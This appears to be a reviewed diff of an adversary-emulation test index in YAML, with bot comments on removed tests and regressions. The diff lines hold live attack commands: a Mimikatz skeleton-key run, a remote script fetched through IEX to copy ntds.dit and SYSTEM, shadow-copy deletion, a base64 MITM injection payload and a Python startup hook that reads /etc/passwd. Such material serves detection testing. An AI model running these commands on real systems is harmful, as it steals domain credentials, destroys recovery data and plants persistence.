dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1556.005:
technique:
type: attack-pattern
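Review bot: as with T1659 above, `identifier: T1556.001` disappears along with the test and only `atomic_tests: []` remains; keep the identifier line. Removing 'Skeleton Key via Mimikatz' also deletes the one test in this file whose cleanup runs `Restart-Computer -Force` on a domain controller, so if this is a deliberate safety decision it belongs in the commit message.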
@@ -100276,62 +98393,6 @@ credential-access:
diskshadow.exe /s #(unknown)
name: command_prompt
elevation_required: true
- name: Copy NTDS in low level NTFS acquisition via MFT parsing
auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
- name: Copy NTDS in low level NTFS acquisition via fsutil
auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
T1558.003:
technique:
type: attack-pattern
@@ -100768,7 +98829,8 @@ credential-access:
'
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force
'
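Review bot: the added line `if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1}` indexes `ExportedCommands` by command name, and the DSInternals module does not export a command literally named `DSInternals`, so this prereq exits 1 even when the module is installed and `Install-Module -Name DSInternals` will run again on every execution. Index by the cmdlet the test actually calls instead, and guard for `Get-Module -ListAvailable` returning several objects when more than one version is installed (for example `($RequiredModule | Select-Object -First 1).ExportedCommands`).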
@@ -102008,61 +100070,6 @@ discovery:
cleanup_command:
name: powershell
elevation_required: false
- name: Device Driver Discovery (Linux)
auto_generated_guid: d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1
description: 'Displays a list of loaded kernel modules on a Linux system, which
is used to enumerate drivers.
'
supported_platforms:
- linux
executor:
command: 'lsmod
'
name: bash
elevation_required: false
- name: Enumerate Kernel Driver Files (Linux)
auto_generated_guid: 13c0fef5-9be9-4d7f-9c6b-901624e53770
description: 'Finds and lists all kernel driver files on a Linux system in order
to provide a broader view of available drivers, not just loaded ones.
'
supported_platforms:
- linux
executor:
command: 'find /lib/modules/$(uname -r)/kernel/drivers -name "*.ko*"
'
name: bash
elevation_required: false
- name: List loaded kernel extensions (macOS)
auto_generated_guid: 71eab73d-5d7d-4681-9a72-7873489a5b85
description: 'Displays a list of loaded kernel extensions (kexts) on a macOS
system.
'
supported_platforms:
- macos
executor:
command: 'kextstat
'
name: bash
elevation_required: false
- name: Find Kernel Extensions (macOS)
auto_generated_guid: c63bbe52-6f17-4832-b221-f07ba8b1736f
description: 'Searches for kernel extension (kext) files on a macOS system.
'
supported_platforms:
- macos
executor:
command: 'kextfind
'
name: bash
elevation_required: false
T1087.002:
technique:
type: attack-pattern
@@ -103647,7 +101654,7 @@ discovery:
- windows
executor:
command: |
tasklist.exe /svc
tasklist.exe
sc query
sc query state= all
name: command_prompt
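Review bot: replacing `tasklist.exe /svc` with `tasklist.exe` drops the service-to-process mapping that makes this a service discovery command; bare `tasklist.exe` lists processes only. Unless the simpler form is intentional, keep `/svc` so the test still produces the command line a T1007 detection would be tuned to.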
@@ -103695,62 +101702,6 @@ discovery:
executor:
name: command_prompt
command: powershell.exe Get-Service
- name: System Service Discovery - macOS launchctl
auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
description: |
Enumerates services on macOS using launchctl. Used by adversaries for
identifying daemons, background services, and persistence mechanisms.
supported_platforms:
- macos
executor:
name: sh
command: launchctl list
- name: System Service Discovery - Windows Scheduled Tasks (schtasks)
auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
description: 'Enumerates scheduled tasks on Windows using schtasks.exe.
'
supported_platforms:
- windows
executor:
name: command_prompt
command: schtasks /query /fo LIST /v
- name: System Service Discovery - Services Registry Enumeration
auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
description: |
Enumerates Windows services by reading the Services registry key
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
Manager APIs or CLI tools such as sc.exe or Get-Service.
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
ForEach-Object {
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
[PSCustomObject]@{
Name = $_.PSChildName
DisplayName = $p.DisplayName
ImagePath = $p.ImagePath
StartType = $p.Start
}
}
- name: System Service Discovery - Linux init scripts
auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
description: |
Enumerates system services by listing SysV init scripts and runlevel
symlinks under /etc/init.d and /etc/rc*.d.
supported_platforms:
- linux
executor:
name: sh
command: |
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
T1040:
technique:
type: attack-pattern
@@ -107413,20 +105364,20 @@ discovery:
description: |
Get a listing of network connections.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires
elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
supported_platforms:
- windows
executor:
command: |
netstat -ano
netstat
net use
net sessions 2>nul
net sessions
name: command_prompt
- name: System Network Connections Discovery with PowerShell
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
description: |
Get a listing of network connections.
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
supported_platforms:
- windows
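Review bot: the description loses the sentence explaining that `net sessions` needs elevated privileges, and the command loses both `-ano` on `netstat` and `2>nul` on `net sessions`. Without `2>nul`, a non-elevated run prints an access-denied error for `net sessions`; without `-ano`, the output no longer includes listening sockets or owning PIDs, which is the part of this output an analyst uses to tie connections back to processes. Keep the previous command and description unless the regression is intended.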
@@ -107435,42 +105386,6 @@ discovery:
'
name: powershell
- name: System Network Connections Discovery via PowerShell (Process Mapping)
auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5
description: 'Enumerate TCP connections and map to owning process names via
PowerShell.
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
- name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
description: |
List active TCP/UDP network connections using ss, with lsof as a fallback
when ss is unavailable. Serves as an alternative to the netstat-based test.
supported_platforms:
- linux
- macos
executor:
name: bash
command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
-ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
fi
'
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
description: |
@@ -107497,19 +105412,6 @@ discovery:
netstat
who -a
name: sh
- name: System Network Connections Discovery via sockstat (Linux, FreeBSD)
auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b
description: 'Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
'
supported_platforms:
- linux
executor:
name: sh
command: |
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
- name: System Discovery using SharpView
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
description: "Get a listing of network connections, domains, domain users, and
@@ -119191,28 +117093,6 @@ impact:
'
name: sh
- name: Windows - Simulate CPU Load with PowerShell
auto_generated_guid: 44315fb0-f78d-4cef-b10f-cf21c1fe2c75
description: |
This test simulates high CPU load using PowerShell, commonly seen in resource hijacking.
Spawns background jobs to stress CPU cores for a specified duration.
supported_platforms:
- windows
input_arguments:
duration_seconds:
description: Duration in seconds to run the CPU stress test
type: integer
default: 30
cpu_threads:
description: Number of threads to stress (default 4)
type: integer
default: 4
executor:
command: |
$end = (Get-Date).AddSeconds(#{duration_seconds})
1..#{cpu_threads} | ForEach-Object { Start-Job { param($t) while((Get-Date) -lt $t) { $i=0; while($i -lt 200000){$i++} } } -ArgumentList $end }
Get-Job | Wait-Job | Remove-Job
name: powershell
T1565.002:
technique:
type: attack-pattern
@@ -119973,35 +117853,6 @@ impact:
cleanup_command: sudo tmutil enable
name: sh
elevation_required: true
- name: Windows - Delete Volume Shadow Copies via Diskshadow
auto_generated_guid: 42111a6f-7e7f-482c-9b1b-3cfd090b999c
description: 'Deletes Windows Volume Shadow Copies via Diskshadow binary. This
technique is used by numerous ransomware families such as Crytox. The binary
is present by default in Windows Server operating systems (since Windows Server
2008). Upon execution, it will delete all shadow copies of the server.
'
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Create volume shadow copy of C:\ . This prereq command only
works on Windows Server or Windows 8.
'
prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
that satisfy the query.")) { exit 0 } else { exit 1 }
'
get_prereq_command: 'vssadmin.exe create shadow /for=c:
'
executor:
command: '"delete shadows all" | diskshadow.exe
'
name: powershell
elevation_required: true
T1561.001:
technique:
type: attack-pattern
@@ -121394,126 +119245,7 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
- name: MITM Proxy Injection (Windows)
auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'winget install --id Python.Python.3 -e
'
- description: curl must be installed
prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'winget install --id cURL.cURL -e
'
- description: mitmproxy must be installed and in PATH
prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'python -m pip install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
| Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
-like "*mitmdump*" }) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
atomic_tests: []
T1078.001:
technique:
type: attack-pattern
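Review bot: this is the same T1659 removal as in the command-and-control section, including the dropped `identifier: T1659` line; the comment there applies here as well, and both copies should be handled the same way.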
+36 -1070
@@ -1529,10 +1529,10 @@ defense-evasion:
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
Ignore
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
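Review bot: the new `cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.` is English prose, not PowerShell, so an executor that runs cleanup will fail with a command-not-found error, and `Out-File T1027.013_decodedEicar.txt` now writes the decoded EICAR test string into whatever the current working directory is instead of `$env:temp`. The previous pair (`Out-File $env:temp\T1027.013_decodedEicar.txt` with `Remove-Item ... -Force -ErrorAction Ignore`) was correct; keep it.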
@@ -1547,59 +1547,15 @@ defense-evasion:
command: |-
$encryptedString = "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"
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
-ErrorAction Ignore
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
- name: Password-Protected ZIP Payload Extraction and Execution
auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
description: |
Extracts and executes a script from a password-protected ZIP archive.
This technique is commonly used by malware families like Emotet and QBot to deliver payloads
via email attachments where the password is provided in the message body.
The encrypted ZIP evades static file analysis until extracted at runtime.
Upon successful execution, displays confirmation and system information.
supported_platforms:
- linux
- macos
input_arguments:
zip_password:
description: Password used to protect the ZIP archive
type: String
default: infected
dependency_executor_name: bash
dependencies:
- description: 'zip and unzip must be installed
'
prereq_command: 'which zip && which unzip
'
get_prereq_command: 'echo "Install zip and unzip using your package manager
(apt-get, yum, or brew)"
'
executor:
command: |
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
cleanup_command: |
rm -f /tmp/art_payload.sh
rm -f /tmp/art_encrypted.zip
name: bash
T1014:
technique:
type: attack-pattern
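Review bot: same problem as the decode test above: `cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.` is not a runnable command and `out-file T1027.013_decryptedEicar.txt` drops the `$env:temp` prefix, so the decrypted EICAR string lands in the current directory with no automated cleanup. The removal of the 'Password-Protected ZIP Payload Extraction and Execution' test is unrelated to those two lines and should be a separate commit, or at least called out in the message.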
@@ -15154,7 +15110,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -15184,7 +15140,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
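Review bot: `identifier: T1556.001` is dropped here too (the header shows 7 lines becoming 6) while `atomic_tests: []` stays; keep the identifier so the defense-evasion entry matches the credential-access one and the rest of the index.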
@@ -24976,7 +24931,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -25012,102 +24967,7 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -28422,7 +28282,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
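Review bot: the `name` field changes from the qualified form `'System Services: Systemctl'` to the bare sub-technique name `Systemctl`, while the `modified` timestamp on the line above is unchanged, so this is a change in how the converter renders the name rather than an upstream ATT&CK data refresh. Anything that matches on or displays the `Parent: Sub` form (docs generation, test output, search) needs to be checked, and the commit message should state that the rename is intentional; the same rename recurs for every sub-technique touched in this diff.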
@@ -28445,586 +28305,7 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests:
- name: Create and Enable a Malicious systemd Service Unit
auto_generated_guid: e58c8723-5503-4533-b642-535cd20ec648
description: |
Creates a new systemd service unit file in /etc/systemd/system/ and enables it using
systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow
to establish persistence or execute arbitrary commands under the context of systemd.
This simulates the full attacker workflow: writing the unit file, reloading the systemd
daemon, enabling the service to survive reboots, and starting it immediately. This is
consistent with techniques observed in ransomware precursor activity and post-exploitation
frameworks targeting Linux infrastructure.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the malicious service to create
type: string
default: atomic-test
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "echo atomictest > /tmp/atomic_service_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
